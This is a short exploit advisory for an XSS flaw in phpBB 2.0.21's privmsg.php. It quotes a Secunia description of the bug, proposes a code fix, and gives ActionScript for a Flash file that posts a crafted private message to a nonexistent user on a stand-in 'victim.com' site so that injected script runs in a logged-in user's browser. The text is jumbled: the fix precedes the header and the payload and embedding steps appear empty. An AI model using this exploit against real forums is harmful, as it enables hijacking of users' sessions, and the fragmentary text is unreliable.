|
|
Put some text here
And send it to the admin (or a normal user)
users must be logged-in.
Fixing:
open phpBB2/privmsg.php
find:
if (!($to_userdata = $db->sql_fetchrow($result)))
{
$error = TRUE;
$error_msg = $lang['No_such_user'];
replace with:
if (!($to_userdata = $db->sql_fetchrow($result)))
{
$error = TRUE;
echo "Sorry, but no such user exists.";
exit;
phpBB (privmsg.php) XSS Exploit
By: Demential
Web: http://headburn.altervista.org
E-mail: info@burnhead.it
PhpBB website: http://phpbb.com
Exploit tested on phpBB 2.0.21
Secunia.com said:
Input passed to the form field "Message body" in privmsg.php
is not properly sanitised before it is returned to the user
when sending messages to a non-existent user.
This can be exploited to execute arbitrary HTML and script code
in a user's browser session in context of an affected site.
The Exploit:
Create a Shockwave Flash file with this code:
var username:String = "user_that_doesnt_exist";
var subject:String = "Xss Exploitation";
var message:String = "";
var folder:String = "inbox";
var mode:String = "post";
var post:String = "Submit";
getURL("http://victim.com/phpBB2/privmsg.php", "_self", "POST");
Put it into a web page: